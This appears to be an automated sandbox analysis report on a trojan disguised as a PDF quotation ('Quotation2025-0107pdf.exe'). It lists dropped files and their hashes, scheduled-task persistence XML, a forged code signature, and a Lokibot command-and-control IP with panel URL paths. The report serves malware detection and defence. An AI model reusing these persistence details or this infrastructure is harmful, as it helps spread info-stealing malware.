                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:18
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Quotation2025-0107pdf.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@19/17@0/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 99%
                                                                                    • Number of executed functions: 103
                                                                                    • Number of non-executed functions: 38
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 184.28.90.27, 172.202.163.200, 13.107.246.45
                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    TimeTypeDescription
                                                                                    06:31:56API Interceptor129x Sleep call for process: Quotation2025-0107pdf.exe modified
                                                                                    06:31:58API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                    06:32:01API Interceptor1x Sleep call for process: mexnJkivovwH.exe modified
                                                                                    11:32:00Task SchedulerRun new task: mexnJkivovwH path: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    94.156.177.41ZsRFRjkt9q.exeGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.41/alpha/five/fre.php
                                                                                    0yWVteGq5T.exeGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.41/simple/five/fre.php
                                                                                    CLOSURE DATE FOR THE YEAR.exeGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.41/kings/five/fre.php
                                                                                    Order84746.exeGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.41/davinci/five/fre.php
                                                                                    FVR-N2411-07396.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                                                                    • 94.156.177.41/soja/five/fre.php
                                                                                    Scan copy.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                                                                    • 94.156.177.41/simple/five/fre.php
                                                                                    file.exeGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.41/maxzi/five/fre.php
                                                                                    Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                    • 94.156.177.41/simple/five/fre.php
                                                                                    stthigns.docGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.41/maxzi/five/fre.php
                                                                                    goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                                                                    • 94.156.177.41/maxzi/five/fre.php
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    NET1-ASBGKloki.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                    • 83.222.191.90
                                                                                    Kloki.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 83.222.191.90
                                                                                    Kloki.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    • 83.222.191.90
                                                                                    Kloki.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 83.222.191.90
                                                                                    Kloki.spc.elfGet hashmaliciousUnknownBrowse
                                                                                    • 83.222.191.90
                                                                                    Kloki.mips.elfGet hashmaliciousMiraiBrowse
                                                                                    • 83.222.191.90
                                                                                    Kloki.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                    • 83.222.191.90
                                                                                    Kloki.arm4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 83.222.191.90
                                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                                    • 83.222.191.90
                                                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                                                    • 83.222.191.90
                                                                                    No context
                                                                                    No context
                                                                                    Process:C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1216
                                                                                    Entropy (8bit):5.34331486778365
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                    MD5:8B21C0FDF91680677FEFC8890882FD1F
                                                                                    SHA1:E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
                                                                                    SHA-256:E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
                                                                                    SHA-512:1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
                                                                                    Malicious:true
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                    Process:C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1216
                                                                                    Entropy (8bit):5.34331486778365
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                    MD5:8B21C0FDF91680677FEFC8890882FD1F
                                                                                    SHA1:E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
                                                                                    SHA-256:E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
                                                                                    SHA-512:1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2232
                                                                                    Entropy (8bit):5.380805901110357
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                                                                    MD5:F9B7CF60C22DBE6B73266580FFD54629
                                                                                    SHA1:05ED734C0A5EF2ECD025D4E39321ECDC96612623
                                                                                    SHA-256:880A3240A482AB826198F84F548F4CB5B906E4A2D7399D19E3EF60916B8D2D89
                                                                                    SHA-512:F55EFB17C1A45D594D165B9DC4FA2D1364B38AA2B0D1B3BAAE6E1E14B8F3BD77E3A28B7D89FA7F6BF3EEF3652434228B1A42BF9851F2CFBB6A7DCC0254AAAE38
                                                                                    Malicious:false
                                                                                    Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1578
                                                                                    Entropy (8bit):5.109490627150337
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta4+xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT1yv
                                                                                    MD5:224FCB103E17065CEFD6151E048226D7
                                                                                    SHA1:236687AFABE3832DC5F1C32C87B9D0CD17AE046D
                                                                                    SHA-256:990A26A889F82959DF42AD1979EAD9F9E1DD923E98B53E53D9EEF07E4374156D
                                                                                    SHA-512:5DD118F7C51CAED3D316440CB14238B80D0E10CE577024346ADC6DF82BDDD01DFD12AD08C232AD12AE847D47705167756279D62B525C45A2C657CE43D3C4AD09
                                                                                    Malicious:true
                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                    Process:C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1578
                                                                                    Entropy (8bit):5.109490627150337
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta4+xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT1yv
                                                                                    MD5:224FCB103E17065CEFD6151E048226D7
                                                                                    SHA1:236687AFABE3832DC5F1C32C87B9D0CD17AE046D
                                                                                    SHA-256:990A26A889F82959DF42AD1979EAD9F9E1DD923E98B53E53D9EEF07E4374156D
                                                                                    SHA-512:5DD118F7C51CAED3D316440CB14238B80D0E10CE577024346ADC6DF82BDDD01DFD12AD08C232AD12AE847D47705167756279D62B525C45A2C657CE43D3C4AD09
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                    Process:C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):46
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3::
                                                                                    MD5:D898504A722BFF1524134C6AB6A5EAA5
                                                                                    SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                                                                                    SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                                                                                    SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                                                                                    Malicious:false
                                                                                    Preview:..............................................
                                                                                    Process:C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):725512
                                                                                    Entropy (8bit):7.401624367154157
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:mfuj5rWYMV+I4MVKWTwxAVNhpDsWpwEQx4JNXwwaFi3oqW8JdKPCTjcZPq0vzkR:gSrGRgMwxAVNvlvXw5LAdKKn8M
                                                                                    MD5:FF0A37E1048052C58526A9C38EFC1954
                                                                                    SHA1:CDB18E6094372C6AB8280723BB9C64B9BA8269DA
                                                                                    SHA-256:9E39A3FC8FCA2CC19C64E0C75E88F897A7D07F43D3430596FECDCCAE2B36D680
                                                                                    SHA-512:5EBF8FB73960113811B77534BD773F1C541FB381775E7944CC9CA8D0D48FB2E07D8D63163B074E8DAC89D61AA698325AE2FA020A1B15695F0EF87531F6FEA411
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 24%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}g..............0.................. ........@.. ....................... ............`.................................<...O........................6........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H.......h`...|..........P................................................ZL.ZzM...E...H.N..;..._<........!..`^#g.....Y.1...]oU....>.J.n?...Y.~...\q.T".J... .hM.V.=...7.z. =l.P...p._.M..R..O....+`<.LN..+1..D8...nc.......X.VT....5.i..8.v(.A?F.'...K.i.R.[>g...-....\.2k[..|T. ..V....V..}.. .9..L...[.VsN.6qA.y].I.3.......Sc.k..d..yCa[j..6M.........C.o.I.....{U5V&.*c.&.E..........L.x\.`.'.:..........fP\..S@.1....;_.C..t-.l..T....b.....*....5.x...xSR.i.w:...3.....
                                                                                    Process:C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.401624367154157
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Quotation2025-0107pdf.exe
                                                                                    File size:725'512 bytes
                                                                                    MD5:ff0a37e1048052c58526a9c38efc1954
                                                                                    SHA1:cdb18e6094372c6ab8280723bb9c64b9ba8269da
                                                                                    SHA256:9e39a3fc8fca2cc19c64e0c75e88f897a7d07f43d3430596fecdccae2b36d680
                                                                                    SHA512:5ebf8fb73960113811b77534bd773f1c541fb381775e7944cc9ca8d0d48fb2e07d8d63163b074e8dac89d61aa698325ae2fa020a1b15695f0ef87531f6fea411
                                                                                    SSDEEP:12288:mfuj5rWYMV+I4MVKWTwxAVNhpDsWpwEQx4JNXwwaFi3oqW8JdKPCTjcZPq0vzkR:gSrGRgMwxAVNvlvXw5LAdKKn8M
                                                                                    TLSH:48F48B492355E4CDD0D70ABC5893FFB795104D484A22C2C247EEB9A7369B98EBA0F1C7
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}g..............0.................. ........@.. ....................... ............`................................
                                                                                    Icon Hash:13294d96922b2b0f
                                                                                    Entrypoint:0x4add8e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x677D0404 [Tue Jan 7 10:37:56 2025 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                    Error Number:-2146869232
                                                                                    Not Before, Not After
                                                                                    • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                    Subject Chain
                                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                    Version:3
                                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
